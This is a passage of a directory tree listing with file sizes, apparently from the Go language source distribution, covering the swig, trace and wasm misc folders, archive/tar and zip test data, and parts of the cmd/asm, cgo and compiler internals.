│ │ │ ├── [3.0K] experiment_toolid_test.go
│ │ │ ├── [2.1K] overlaydir_test.go
│ │ │ └── [1.3K] reboot_test.go
│ │ ├── [4.0K] swig
│ │ │ ├── [4.0K] callback
│ │ │ │ ├── [ 388] callback.cc
│ │ │ │ ├── [ 267] callback.go
│ │ │ │ ├── [ 529] callback.h
│ │ │ │ ├── [ 374] callback.swigcxx
│ │ │ │ └── [ 673] callback_test.go
│ │ │ └── [4.0K] stdio
│ │ │ ├── [ 418] file.go
│ │ │ ├── [ 563] file.swig
│ │ │ └── [ 657] file_test.go
│ │ ├── [4.0K] trace
│ │ │ ├── [4.9K] README.md
│ │ │ ├── [2.5M] trace_viewer_full.html
│ │ │ └── [116K] webcomponents.min.js
│ │ └── [4.0K] wasm
│ │ ├── [ 446] go_js_wasm_exec
│ │ ├── [1.3K] wasm_exec.html
│ │ ├── [ 16K] wasm_exec.js
│ │ └── [1.3K] wasm_exec_node.js
│ ├── [1.3K] PATENTS
│ ├── [1.4K] README.md
│ ├── [ 397] SECURITY.md
│ ├── [4.0K] src
│ │ ├── [ 407] all.bash
│ │ ├── [ 754] all.bat
│ │ ├── [ 388] all.rc
│ │ ├── [4.0K] archive
│ │ │ ├── [4.0K] tar
│ │ │ │ ├── [ 24K] common.go
│ │ │ │ ├── [ 11K] format.go
│ │ │ │ ├── [ 26K] reader.go
│ │ │ │ ├── [ 431] stat_actime1.go
│ │ │ │ ├── [ 421] stat_actime2.go
│ │ │ │ ├── [3.2K] stat_unix.go
│ │ │ │ ├── [9.0K] strconv.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [2.5K] file-and-dir.tar
│ │ │ │ │ ├── [2.5K] gnu-incremental.tar
│ │ │ │ │ ├── [2.5K] gnu-long-nul.tar
│ │ │ │ │ ├── [4.5K] gnu-multi-hdrs.tar
│ │ │ │ │ ├── [2.5K] gnu-nil-sparse-data.tar
│ │ │ │ │ ├── [1.5K] gnu-nil-sparse-hole.tar
│ │ │ │ │ ├── [1.5K] gnu-not-utf8.tar
│ │ │ │ │ ├── [5.0K] gnu-sparse-big.tar
│ │ │ │ │ ├── [3.0K] gnu.tar
│ │ │ │ │ ├── [2.5K] gnu-utf8.tar
│ │ │ │ │ ├── [2.5K] hardlink.tar
│ │ │ │ │ ├── [ 10K] hdr-only.tar
│ │ │ │ │ ├── [1.5K] invalid-go17.tar
│ │ │ │ │ ├── [ 512] issue10968.tar
│ │ │ │ │ ├── [ 602] issue11169.tar
│ │ │ │ │ ├── [ 512] issue12435.tar
│ │ │ │ │ ├── [ 512] neg-size.tar
│ │ │ │ │ ├── [1.0K] nil-uid.tar
│ │ │ │ │ ├── [2.5K] pax-bad-hdr-file.tar
│ │ │ │ │ ├── [2.5K] pax-bad-mtime-file.tar
│ │ │ │ │ ├── [7.0K] pax-global-records.tar
│ │ │ │ │ ├── [4.5K] pax-multi-hdrs.tar
│ │ │ │ │ ├── [4.0K] pax-nil-sparse-data.tar
│ │ │ │ │ ├── [3.0K] pax-nil-sparse-hole.tar
│ │ │ │ │ ├── [2.5K] pax-nul-path.tar
│ │ │ │ │ ├── [2.5K] pax-nul-xattrs.tar
│ │ │ │ │ ├── [1.0K] pax-path-hdr.tar
│ │ │ │ │ ├── [2.5K] pax-pos-size-file.tar
│ │ │ │ │ ├── [2.5K] pax-records.tar
│ │ │ │ │ ├── [6.0K] pax-sparse-big.tar
│ │ │ │ │ ├── [ 10K] pax.tar
│ │ │ │ │ ├── [ 11] small2.txt
│ │ │ │ │ ├── [ 5] small.txt
│ │ │ │ │ ├── [ 18K] sparse-formats.tar
│ │ │ │ │ ├── [3.0K] star.tar
│ │ │ │ │ ├── [2.5K] trailing-slash.tar
│ │ │ │ │ ├── [1.5K] ustar-file-devs.tar
│ │ │ │ │ ├── [1.5K] ustar-file-reg.tar
│ │ │ │ │ ├── [2.0K] ustar.tar
│ │ │ │ │ ├── [3.5K] v7.tar
│ │ │ │ │ ├── [1.5K] writer-big-long.tar
│ │ │ │ │ ├── [ 512] writer-big.tar
│ │ │ │ │ ├── [3.5K] writer.tar
│ │ │ │ │ └── [5.0K] xattrs.tar
│ │ │ │ └── [ 19K] writer.go
│ │ │ └── [4.0K] zip
│ │ │ ├── [ 23K] reader.go
│ │ │ ├── [3.6K] register.go
│ │ │ ├── [ 12K] struct.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 314] crc32-not-streamed.zip
│ │ │ │ ├── [ 154] dd.zip
│ │ │ │ ├── [ 441] go-no-datadesc-sig.zip.base64
│ │ │ │ ├── [ 785] gophercolor16x16.png
│ │ │ │ ├── [ 242] go-with-datadesc-sig.zip
│ │ │ │ ├── [1.9K] readme.notzip
│ │ │ │ ├── [1.8K] readme.zip
│ │ │ │ ├── [ 428] subdir.zip
│ │ │ │ ├── [ 173] symlink.zip
│ │ │ │ ├── [1.2K] test-trailing-junk.zip
│ │ │ │ ├── [1.1K] test.zip
│ │ │ │ ├── [ 140] time-22738.zip
│ │ │ │ ├── [ 150] time-7zip.zip
│ │ │ │ ├── [ 148] time-go.zip
│ │ │ │ ├── [ 166] time-infozip.zip
│ │ │ │ ├── [ 142] time-osx.zip
│ │ │ │ ├── [ 114] time-win7.zip
│ │ │ │ ├── [ 150] time-winrar.zip
│ │ │ │ ├── [ 150] time-winzip.zip
│ │ │ │ ├── [ 620] unix.zip
│ │ │ │ ├── [ 146] utf8-7zip.zip
│ │ │ │ ├── [ 162] utf8-infozip.zip
│ │ │ │ ├── [ 138] utf8-osx.zip
│ │ │ │ ├── [ 146] utf8-winrar.zip
│ │ │ │ ├── [ 146] utf8-winzip.zip
│ │ │ │ ├── [ 412] winxp.zip
│ │ │ │ ├── [ 266] zip64-2.zip
│ │ │ │ └── [ 242] zip64.zip
│ │ │ └── [ 18K] writer.go
│ │ ├── [3.7K] bootstrap.bash
│ │ ├── [4.0K] bufio
│ │ │ ├── [ 20K] bufio.go
│ │ │ └── [ 14K] scan.go
│ │ ├── [1.8K] buildall.bash
│ │ ├── [4.0K] builtin
│ │ │ └── [ 11K] builtin.go
│ │ ├── [4.0K] bytes
│ │ │ ├── [ 15K] buffer.go
│ │ │ ├── [ 32K] bytes.go
│ │ │ └── [3.8K] reader.go
│ │ ├── [ 518] clean.bash
│ │ ├── [ 598] clean.bat
│ │ ├── [ 380] clean.rc
│ │ ├── [4.0K] cmd
│ │ │ ├── [4.0K] addr2line
│ │ │ │ └── [2.3K] main.go
│ │ │ ├── [4.0K] api
│ │ │ │ ├── [ 29K] goapi.go
│ │ │ │ ├── [3.3K] run.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [4.0K] src
│ │ │ │ ├── [4.0K] issue21181
│ │ │ │ │ ├── [4.0K] dep
│ │ │ │ │ │ ├── [ 12] p_amd64.go
│ │ │ │ │ │ └── [ 53] p.go
│ │ │ │ │ ├── [4.0K] indirect
│ │ │ │ │ │ └── [ 57] p.go
│ │ │ │ │ └── [4.0K] p
│ │ │ │ │ ├── [ 64] p_amd64.go
│ │ │ │ │ ├── [ 105] p_generic.go
│ │ │ │ │ └── [ 78] p.go
│ │ │ │ ├── [4.0K] issue29837
│ │ │ │ │ └── [4.0K] p
│ │ │ │ │ └── [ 62] README
│ │ │ │ └── [4.0K] pkg
│ │ │ │ ├── [4.0K] p1
│ │ │ │ │ ├── [3.3K] golden.txt
│ │ │ │ │ └── [2.9K] p1.go
│ │ │ │ ├── [4.0K] p2
│ │ │ │ │ ├── [ 178] golden.txt
│ │ │ │ │ └── [ 155] p2.go
│ │ │ │ ├── [4.0K] p3
│ │ │ │ │ ├── [ 166] golden.txt
│ │ │ │ │ └── [ 150] p3.go
│ │ │ │ └── [4.0K] p4
│ │ │ │ ├── [ 289] golden.txt
│ │ │ │ └── [ 517] p4.go
│ │ │ ├── [4.0K] asm
│ │ │ │ ├── [1.7K] doc.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] arch
│ │ │ │ │ │ ├── [ 20K] arch.go
│ │ │ │ │ │ ├── [ 10K] arm64.go
│ │ │ │ │ │ ├── [6.1K] arm.go
│ │ │ │ │ │ ├── [1.7K] mips.go
│ │ │ │ │ │ ├── [2.9K] ppc64.go
│ │ │ │ │ │ ├── [ 943] riscv64.go
│ │ │ │ │ │ └── [1.2K] s390x.go
│ │ │ │ │ ├── [4.0K] asm
│ │ │ │ │ │ ├── [ 24K] asm.go
│ │ │ │ │ │ ├── [ 36K] parse.go
│ │ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ │ ├── [1.2K] 386enc.s
│ │ │ │ │ │ ├── [2.0K] 386.s
│ │ │ │ │ │ ├── [1.8K] amd64dynlinkerror.s
│ │ │ │ │ │ ├── [ 58K] amd64enc_extra.s
│ │ │ │ │ │ ├── [582K] amd64enc.s
│ │ │ │ │ │ ├── [8.6K] amd64error.s
│ │ │ │ │ │ ├── [3.3K] amd64.s
│ │ │ │ │ │ ├── [ 45K] arm64enc.s
│ │ │ │ │ │ ├── [ 41K] arm64error.s
│ │ │ │ │ │ ├── [ 87K] arm64.s
│ │ │ │ │ │ ├── [ 14K] armerror.s
│ │ │ │ │ │ ├── [ 68K] arm.s
│ │ │ │ │ │ ├── [4.6K] armv6.s
│ │ │ │ │ │ ├── [4.0K] avx512enc
│ │ │ │ │ │ │ ├── [ 29K] aes_avx512f.s
│ │ │ │ │ │ │ ├── [5.9K] avx512_4fmaps.s
│ │ │ │ │ │ │ ├── [1.9K] avx512_4vnniw.s
│ │ │ │ │ │ │ ├── [ 10K] avx512_bitalg.s
│ │ │ │ │ │ │ ├── [159K] avx512bw.s
│ │ │ │ │ │ │ ├── [ 13K] avx512cd.s
│ │ │ │ │ │ │ ├── [195K] avx512dq.s
│ │ │ │ │ │ │ ├── [ 28K] avx512er.s
│ │ │ │ │ │ │ ├── [410K] avx512f.s
│ │ │ │ │ │ │ ├── [ 13K] avx512_ifma.s
│ │ │ │ │ │ │ ├── [3.4K] avx512pf.s
│ │ │ │ │ │ │ ├── [ 97K] avx512_vbmi2.s
│ │ │ │ │ │ │ ├── [ 29K] avx512_vbmi.s
│ │ │ │ │ │ │ ├── [ 28K] avx512_vnni.s
│ │ │ │ │ │ │ ├── [5.5K] avx512_vpopcntdq.s
│ │ │ │ │ │ │ ├── [ 23K] gfni_avx512f.s
│ │ │ │ │ │ │ └── [8.2K] vpclmulqdq_avx512f.s
│ │ │ │ │ │ ├── [ 227] buildtagerror.s
│ │ │ │ │ │ ├── [ 12K] mips64.s
│ │ │ │ │ │ ├── [6.6K] mips.s
│ │ │ │ │ │ ├── [ 32K] ppc64.s
│ │ │ │ │ │ ├── [1.5K] riscv64error.s
│ │ │ │ │ │ ├── [ 12K] riscv64.s
│ │ │ │ │ │ └── [ 21K] s390x.s
│ │ │ │ │ ├── [4.0K] flags
│ │ │ │ │ │ └── [2.9K] flags.go
│ │ │ │ │ └── [4.0K] lex
│ │ │ │ │ ├── [ 13K] input.go
│ │ │ │ │ ├── [4.2K] lex.go
│ │ │ │ │ ├── [1.6K] slice.go
│ │ │ │ │ ├── [1.2K] stack.go
│ │ │ │ │ └── [3.0K] tokenizer.go
│ │ │ │ └── [2.5K] main.go
│ │ │ ├── [4.0K] buildid
│ │ │ │ ├── [1.3K] buildid.go
│ │ │ │ └── [ 558] doc.go
│ │ │ ├── [4.0K] cgo
│ │ │ │ ├── [ 13K] ast.go
│ │ │ │ ├── [ 596] ast_go118.go
│ │ │ │ ├── [ 451] ast_go1.go
│ │ │ │ ├── [ 40K] doc.go
│ │ │ │ ├── [ 93K] gcc.go
│ │ │ │ ├── [4.5K] godefs.go
│ │ │ │ ├── [ 13K] main.go
│ │ │ │ ├── [ 58K] out.go
│ │ │ │ └── [3.4K] util.go
│ │ │ ├── [4.0K] compile
│ │ │ │ ├── [ 39K] abi-internal.md
│ │ │ │ ├── [ 10K] doc.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] abi
│ │ │ │ │ │ └── [ 27K] abiutils.go
│ │ │ │ │ ├── [4.0K] amd64
│ │ │ │ │ │ ├── [ 604] galign.go
│ │ │ │ │ │ ├── [5.5K] ggen.go
│ │ │ │ │ │ └── [ 46K] ssa.go
│ │ │ │ │ ├── [4.0K] arm
│ │ │ │ │ │ ├── [ 626] galign.go
│ │ │ │ │ │ ├── [1.8K] ggen.go
│ │ │ │ │ │ └── [ 28K] ssa.go
│ │ │ │ │ ├── [4.0K] arm64
│ │ │ │ │ │ ├── [ 666] galign.go
│ │ │ │ │ │ ├── [2.8K] ggen.go
│ │ │ │ │ │ └── [ 37K] ssa.go
│ │ │ │ │ ├── [4.0K] base
│ │ │ │ │ │ ├── [2.0K] base.go
│ │ │ │ │ │ ├── [ 377] bootstrap_false.go
│ │ │ │ │ │ ├── [ 374] bootstrap_true.go
│ │ │ │ │ │ ├── [3.2K] debug.go
│ │ │ │ │ │ ├── [ 17K] flag.go
│ │ │ │ │ │ ├── [1.1K] link.go
│ │ │ │ │ │ ├── [1.3K] mapfile_mmap.go
│ │ │ │ │ │ ├── [ 565] mapfile_read.go
│ │ │ │ │ │ ├── [8.3K] print.go
│ │ │ │ │ │ └── [5.8K] timings.go
│ │ │ │ │ ├── [4.0K] bitvec
│ │ │ │ │ │ └── [3.8K] bv.go
│ │ │ │ │ ├── [4.0K] deadcode
│ │ │ │ │ │ └── [5.7K] deadcode.go
│ │ │ │ │ ├── [4.0K] devirtualize
│ │ │ │ │ │ └── [2.2K] devirtualize.go
│ │ │ │ │ ├── [4.0K] dwarfgen
│ │ │ │ │ │ ├── [ 18K] dwarf.go
│ │ │ │ │ │ ├── [ 13K] dwinl.go
│ │ │ │ │ │ ├── [2.2K] marker.go
│ │ │ │ │ │ └── [3.3K] scope.go
│ │ │ │ │ ├── [4.0K] escape
│ │ │ │ │ │ ├── [2.9K] assign.go
│ │ │ │ │ │ ├── [ 13K] call.go
│ │ │ │ │ │ ├── [1.2K] desugar.go
│ │ │ │ │ │ ├── [ 12K] escape.go
│ │ │ │ │ │ ├── [8.8K] expr.go
│ │ │ │ │ │ ├── [8.2K] graph.go
│ │ │ │ │ │ ├── [2.6K] leaks.go
│ │ │ │ │ │ ├── [7.8K] solve.go
│ │ │ │ │ │ ├── [4.7K] stmt.go
│ │ │ │ │ │ └── [6.1K] utils.go
│ │ │ │ │ ├── [4.0K] gc
│ │ │ │ │ │ ├── [ 368] bootstrap.go
│ │ │ │ │ │ ├── [4.1K] compile.go
│ │ │ │ │ │ ├── [1.2K] export.go
│ │ │ │ │ │ ├── [ 11K] main.go
│ │ │ │ │ │ ├── [8.3K] obj.go
│ │ │ │ │ │ ├── [ 291] pprof.go
│ │ │ │ │ │ ├── [ 556] trace.go
│ │ │ │ │ │ └── [1.8K] util.go
│ │ │ │ │ ├── [4.0K] importer
│ │ │ │ │ │ ├── [2.5K] exportdata.go
│ │ │ │ │ │ ├── [4.7K] gcimporter.go
│ │ │ │ │ │ ├── [ 19K] iimport.go
│ │ │ │ │ │ ├── [3.3K] support.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [ 273] a.go
│ │ │ │ │ │ │ ├── [ 225] b.go
│ │ │ │ │ │ │ ├── [1.5K] exports.go
│ │ │ │ │ │ │ ├── [ 572] generics.go
│ │ │ │ │ │ │ ├── [ 340] issue15920.go
│ │ │ │ │ │ │ ├── [ 196] issue20046.go
│ │ │ │ │ │ │ ├── [ 280] issue25301.go
│ │ │ │ │ │ │ ├── [ 233] issue25596.go
│ │ │ │ │ │ │ ├── [ 236] p.go
│ │ │ │ │ │ │ └── [4.0K] versions
│ │ │ │ │ │ │ └── [ 918] test.go
│ │ │ │ │ │ └── [ 12K] ureader.go
│ │ │ │ │ ├── [4.0K] inline
│ │ │ │ │ │ └── [ 41K] inl.go
│ │ │ │ │ ├── [4.0K] ir
│ │ │ │ │ │ ├── [1.4K] bitset.go
│ │ │ │ │ │ ├── [1.1K] cfg.go
│ │ │ │ │ │ ├── [ 755] class_string.go
│ │ │ │ │ │ ├── [2.1K] const.go
│ │ │ │ │ │ ├── [2.7K] copy.go
│ │ │ │ │ │ ├── [6.2K] dump.go
│ │ │ │ │ │ ├── [ 28K] expr.go
│ │ │ │ │ │ ├── [ 28K] fmt.go
│ │ │ │ │ │ ├── [ 16K] func.go
│ │ │ │ │ │ ├── [ 171] ir.go
│ │ │ │ │ │ ├── [2.8K] mini.go
│ │ │ │ │ │ ├── [4.8K] mknode.go
│ │ │ │ │ │ ├── [ 18K] name.go
│ │ │ │ │ │ ├── [ 29K] node_gen.go
│ │ │ │ │ │ ├── [ 18K] node.go
│ │ │ │ │ │ ├── [5.1K] op_string.go
│ │ │ │ │ │ ├── [ 757] package.go
│ │ │ │ │ │ ├── [4.2K] scc.go
│ │ │ │ │ │ ├── [9.4K] stmt.go
│ │ │ │ │ │ ├── [1.7K] symtab.go
│ │ │ │ │ │ ├── [5.3K] type.go
│ │ │ │ │ │ ├── [2.9K] val.go
│ │ │ │ │ │ └── [5.4K] visit.go
│ │ │ │ │ ├── [4.0K] liveness
│ │ │ │ │ │ ├── [9.2K] arg.go
│ │ │ │ │ │ ├── [2.0K] bvset.go
│ │ │ │ │ │ └── [ 44K] plive.go
│ │ │ │ │ ├── [4.0K] logopt
│ │ │ │ │ │ ├── [ 386] escape_bootstrap.go
│ │ │ │ │ │ ├── [ 291] escape.go
│ │ │ │ │ │ └── [ 18K] log_opts.go
│ │ │ │ │ ├── [4.0K] mips
│ │ │ │ │ │ ├── [ 715] galign.go
│ │ │ │ │ │ ├── [1.7K] ggen.go
│ │ │ │ │ │ └── [ 21K] ssa.go
│ │ │ │ │ ├── [4.0K] mips64
│ │ │ │ │ │ ├── [ 718] galign.go
│ │ │ │ │ │ ├── [1.8K] ggen.go
│ │ │ │ │ │ └── [ 22K] ssa.go
│ │ │ │ │ ├── [4.0K] noder
│ │ │ │ │ │ ├── [1.3K] codes.go
│ │ │ │ │ │ ├── [ 10K] decl.go
│ │ │ │ │ │ ├── [ 800] export.go
│ │ │ │ │ │ ├── [ 14K] expr.go
│ │ │ │ │ │ ├── [1.9K] func.go
│ │ │ │ │ │ ├── [6.0K] helpers.go
│ │ │ │ │ │ ├── [ 10K] import.go
│ │ │ │ │ │ ├── [ 11K] irgen.go
│ │ │ │ │ │ ├── [5.3K] lex.go
│ │ │ │ │ │ ├── [6.9K] linker.go
│ │ │ │ │ │ ├── [ 13K] noder.go
│ │ │ │ │ │ ├── [5.6K] object.go
│ │ │ │ │ │ ├── [2.0K] posmap.go
│ │ │ │ │ │ ├── [1.8K] quirks.go
│ │ │ │ │ │ ├── [ 58K] reader.go
│ │ │ │ │ │ ├── [1.5K] scopes.go
│ │ │ │ │ │ ├── [3.7K] sizes.go
│ │ │ │ │ │ ├── [ 76K] stencil.go
│ │ │ │ │ │ ├── [8.7K] stmt.go
│ │ │ │ │ │ ├── [ 28K] transform.go
│ │ │ │ │ │ ├── [ 17K] types.go
│ │ │ │ │ │ ├── [8.9K] unified.go
│ │ │ │ │ │ ├── [3.1K] validate.go
│ │ │ │ │ │ └── [ 40K] writer.go
│ │ │ │ │ ├── [4.0K] objw
│ │ │ │ │ │ ├── [2.3K] objw.go
│ │ │ │ │ │ └── [7.1K] prog.go
│ │ │ │ │ ├── [4.0K] pkginit
│ │ │ │ │ │ ├── [4.3K] init.go
│ │ │ │ │ │ └── [ 10K] initorder.go
│ │ │ │ │ ├── [4.0K] ppc64
│ │ │ │ │ │ ├── [ 682] galign.go
│ │ │ │ │ │ ├── [2.0K] ggen.go
│ │ │ │ │ │ ├── [ 408] opt.go
│ │ │ │ │ │ └── [ 55K] ssa.go
│ │ │ │ │ ├── [4.0K] reflectdata
│ │ │ │ │ │ ├── [ 24K] alg.go
│ │ │ │ │ │ └── [ 62K] reflect.go
│ │ │ │ │ ├── [4.0K] riscv64
│ │ │ │ │ │ ├── [ 592] galign.go
│ │ │ │ │ │ ├── [1.8K] ggen.go
│ │ │ │ │ │ ├── [ 488] gsubr.go
│ │ │ │ │ │ └── [ 21K] ssa.go
│ │ │ │ │ ├── [4.0K] s390x
│ │ │ │ │ │ ├── [ 518] galign.go
│ │ │ │ │ │ ├── [2.5K] ggen.go
│ │ │ │ │ │ └── [ 27K] ssa.go
│ │ │ │ │ ├── [4.0K] ssa
│ │ │ │ │ │ ├── [ 24K] addressingmodes.go
│ │ │ │ │ │ ├── [2.7K] biasedsparsemap.go
│ │ │ │ │ │ ├── [ 11K] block.go
│ │ │ │ │ │ ├── [ 12K] branchelim.go
│ │ │ │ │ │ ├── [2.5K] cache.go
│ │ │ │ │ │ ├── [ 956] checkbce.go
│ │ │ │ │ │ ├── [ 17K] check.go
│ │ │ │ │ │ ├── [ 18K] compile.go
│ │ │ │ │ │ ├── [ 11K] config.go
│ │ │ │ │ │ ├── [1.8K] copyelim.go
│ │ │ │ │ │ ├── [3.2K] critical.go
│ │ │ │ │ │ ├── [9.4K] cse.go
│ │ │ │ │ │ ├── [9.6K] deadcode.go
│ │ │ │ │ │ ├── [9.1K] deadstore.go
│ │ │ │ │ │ ├── [ 51K] debug.go
│ │ │ │ │ │ ├── [ 13K] decompose.go
│ │ │ │ │ │ ├── [8.0K] dom.go
│ │ │ │ │ │ ├── [ 63K] expand_calls.go
│ │ │ │ │ │ ├── [6.7K] flagalloc.go
│ │ │ │ │ │ ├── [ 533] flags_amd64_test.s
│ │ │ │ │ │ ├── [ 699] flags_arm64_test.s
│ │ │ │ │ │ ├── [ 27K] func.go
│ │ │ │ │ │ ├── [3.2K] fuse_branchredirect.go
│ │ │ │ │ │ ├── [4.0K] fuse_comparisons.go
│ │ │ │ │ │ ├── [6.5K] fuse.go
│ │ │ │ │ │ ├── [4.0K] gen
│ │ │ │ │ │ │ ├── [ 45K] 386Ops.go
│ │ │ │ │ │ │ ├── [ 49K] 386.rules
│ │ │ │ │ │ │ ├── [ 620] 386splitload.rules
│ │ │ │ │ │ │ ├── [103K] AMD64Ops.go
│ │ │ │ │ │ │ ├── [115K] AMD64.rules
│ │ │ │ │ │ │ ├── [3.4K] AMD64splitload.rules
│ │ │ │ │ │ │ ├── [ 57K] ARM64Ops.go
│ │ │ │ │ │ │ ├── [156K] ARM64.rules
│ │ │ │ │ │ │ ├── [ 41K] ARMOps.go
│ │ │ │ │ │ │ ├── [ 90K] ARM.rules
│ │ │ │ │ │ │ ├── [ 667] cover.bash
│ │ │ │ │ │ │ ├── [ 401] dec64Ops.go
│ │ │ │ │ │ │ ├── [ 14K] dec64.rules
│ │ │ │ │ │ │ ├── [ 391] decOps.go
│ │ │ │ │ │ │ ├── [2.7K] dec.rules
│ │ │ │ │ │ │ ├── [ 41K] genericOps.go
│ │ │ │ │ │ │ ├── [115K] generic.rules
│ │ │ │ │ │ │ ├── [ 17K] main.go
│ │ │ │ │ │ │ ├── [ 24K] MIPS64Ops.go
│ │ │ │ │ │ │ ├── [ 37K] MIPS64.rules
│ │ │ │ │ │ │ ├── [ 24K] MIPSOps.go
│ │ │ │ │ │ │ ├── [ 35K] MIPS.rules
│ │ │ │ │ │ │ ├── [ 42K] PPC64Ops.go
│ │ │ │ │ │ │ ├── [ 75K] PPC64.rules
│ │ │ │ │ │ │ ├── [ 287] README
│ │ │ │ │ │ │ ├── [ 28K] RISCV64Ops.go
│ │ │ │ │ │ │ ├── [ 34K] RISCV64.rules
│ │ │ │ │ │ │ ├── [ 49K] rulegen.go
│ │ │ │ │ │ │ ├── [ 53K] S390XOps.go
│ │ │ │ │ │ │ ├── [ 84K] S390X.rules
│ │ │ │ │ │ │ ├── [ 18K] WasmOps.go
│ │ │ │ │ │ │ └── [ 17K] Wasm.rules
│ │ │ │ │ │ ├── [ 35K] html.go
│ │ │ │ │ │ ├── [ 576] id.go
│ │ │ │ │ │ ├── [4.8K] layout.go
│ │ │ │ │ │ ├── [3.8K] lca.go
│ │ │ │ │ │ ├── [ 15K] likelyadjust.go
│ │ │ │ │ │ ├── [3.1K] location.go
│ │ │ │ │ │ ├── [9.7K] loopbce.go
│ │ │ │ │ │ ├── [ 15K] loopreschedchecks.go
│ │ │ │ │ │ ├── [2.6K] looprotate.go
│ │ │ │ │ │ ├── [1.4K] lower.go
│ │ │ │ │ │ ├── [ 16K] magic.go
│ │ │ │ │ │ ├── [ 11K] nilcheck.go
│ │ │ │ │ │ ├── [7.8K] numberlines.go
│ │ │ │ │ │ ├── [973K] opGen.go
│ │ │ │ │ │ ├── [ 19K] op.go
│ │ │ │ │ │ ├── [ 308] opt.go
│ │ │ │ │ │ ├── [1.5K] phielim.go
│ │ │ │ │ │ ├── [8.1K] phiopt.go
│ │ │ │ │ │ ├── [ 37K] poset.go
│ │ │ │ │ │ ├── [3.8K] print.go
│ │ │ │ │ │ ├── [ 40K] prove.go
│ │ │ │ │ │ ├── [8.1K] README.md
│ │ │ │ │ │ ├── [ 84K] regalloc.go
│ │ │ │ │ │ ├── [289K] rewrite386.go
│ │ │ │ │ │ ├── [4.1K] rewrite386splitload.go
│ │ │ │ │ │ ├── [889K] rewriteAMD64.go
│ │ │ │ │ │ ├── [ 21K] rewriteAMD64splitload.go
│ │ │ │ │ │ ├── [745K] rewriteARM64.go
│ │ │ │ │ │ ├── [488K] rewriteARM.go
│ │ │ │ │ │ ├── [ 64K] rewritedec64.go
│ │ │ │ │ │ ├── [ 10K] rewritedec.go
│ │ │ │ │ │ ├── [618K] rewritegeneric.go
│ │ │ │ │ │ ├── [ 53K] rewrite.go
│ │ │ │ │ │ ├── [196K] rewriteMIPS64.go
│ │ │ │ │ │ ├── [174K] rewriteMIPS.go
│ │ │ │ │ │ ├── [425K] rewritePPC64.go
│ │ │ │ │ │ ├── [159K] rewriteRISCV64.go
│ │ │ │ │ │ ├── [433K] rewriteS390X.go
│ │ │ │ │ │ ├── [110K] rewriteWasm.go
│ │ │ │ │ │ ├── [ 15K] schedule.go
│ │ │ │ │ │ ├── [ 13K] shortcircuit.go
│ │ │ │ │ │ ├── [2.0K] softfloat.go
│ │ │ │ │ │ ├── [2.0K] sparsemap.go
│ │ │ │ │ │ ├── [1.5K] sparseset.go
│ │ │ │ │ │ ├── [8.1K] sparsetree.go
│ │ │ │ │ │ ├── [ 13K] stackalloc.go
│ │ │ │ │ │ ├── [ 290] stackframe.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [ 151] convertline.go
│ │ │ │ │ │ │ ├── [3.8K] hist.dlv-dbg.nexts
│ │ │ │ │ │ │ ├── [3.7K] hist.dlv-opt.nexts
│ │ │ │ │ │ │ ├── [4.0K] hist.gdb-dbg.nexts
│ │ │ │ │ │ │ ├── [4.5K] hist.gdb-opt.nexts
│ │ │ │ │ │ │ ├── [2.4K] hist.go
│ │ │ │ │ │ │ ├── [ 251] i22558.dlv-dbg.nexts
│ │ │ │ │ │ │ ├── [ 278] i22558.gdb-dbg.nexts
│ │ │ │ │ │ │ ├── [ 773] i22558.go
│ │ │ │ │ │ │ ├── [ 122] i22600.dlv-dbg-race.nexts
│ │ │ │ │ │ │ ├── [ 149] i22600.gdb-dbg-race.nexts
│ │ │ │ │ │ │ ├── [ 358] i22600.go
│ │ │ │ │ │ │ ├── [ 179] infloop.dlv-opt.nexts
│ │ │ │ │ │ │ ├── [ 98] infloop.gdb-opt.nexts
│ │ │ │ │ │ │ ├── [ 177] infloop.go
│ │ │ │ │ │ │ ├── [ 178] inline-dump.go
│ │ │ │ │ │ │ ├── [ 360] pushback.go
│ │ │ │ │ │ │ ├── [ 137] sayhi.go
│ │ │ │ │ │ │ ├── [1.3K] scopes.dlv-dbg.nexts
│ │ │ │ │ │ │ ├── [1.1K] scopes.dlv-opt.nexts
│ │ │ │ │ │ │ ├── [1.3K] scopes.gdb-dbg.nexts
│ │ │ │ │ │ │ ├── [1.1K] scopes.gdb-opt.nexts
│ │ │ │ │ │ │ └── [1.4K] scopes.go
│ │ │ │ │ │ ├── [4.3K] tighten.go
│ │ │ │ │ │ ├── [ 950] TODO
│ │ │ │ │ │ ├── [4.2K] trim.go
│ │ │ │ │ │ ├── [2.0K] tuple.go
│ │ │ │ │ │ ├── [ 15K] value.go
│ │ │ │ │ │ ├── [ 19K] writebarrier.go
│ │ │ │ │ │ ├── [3.3K] xposmap.go
│ │ │ │ │ │ └── [2.1K] zcse.go
│ │ │ │ │ ├── [4.0K] ssagen
│ │ │ │ │ │ ├── [ 13K] abi.go
│ │ │ │ │ │ ├── [1.5K] arch.go
│ │ │ │ │ │ ├── [5.8K] nowb.go
│ │ │ │ │ │ ├── [8.0K] pgen.go
│ │ │ │ │ │ ├── [ 15K] phi.go
│ │ │ │ │ │ └── [269K] ssa.go
│ │ │ │ │ ├── [4.0K] staticdata
│ │ │ │ │ │ ├── [9.4K] data.go
│ │ │ │ │ │ └── [4.9K] embed.go
│ │ │ │ │ ├── [4.0K] staticinit
│ │ │ │ │ │ └── [ 14K] sched.go
│ │ │ │ │ ├── [4.0K] syntax
│ │ │ │ │ │ ├── [8.7K] branches.go
│ │ │ │ │ │ ├── [4.5K] dumper.go
│ │ │ │ │ │ ├── [8.7K] nodes.go
│ │ │ │ │ │ ├── [1.0K] operator_string.go
│ │ │ │ │ │ ├── [ 61K] parser.go
│ │ │ │ │ │ ├── [5.2K] pos.go
│ │ │ │ │ │ ├── [6.5K] positions.go
│ │ │ │ │ │ ├── [ 20K] printer.go
│ │ │ │ │ │ ├── [ 17K] scanner.go
│ │ │ │ │ │ ├── [5.7K] source.go
│ │ │ │ │ │ ├── [3.1K] syntax.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [1.8K] chans.go
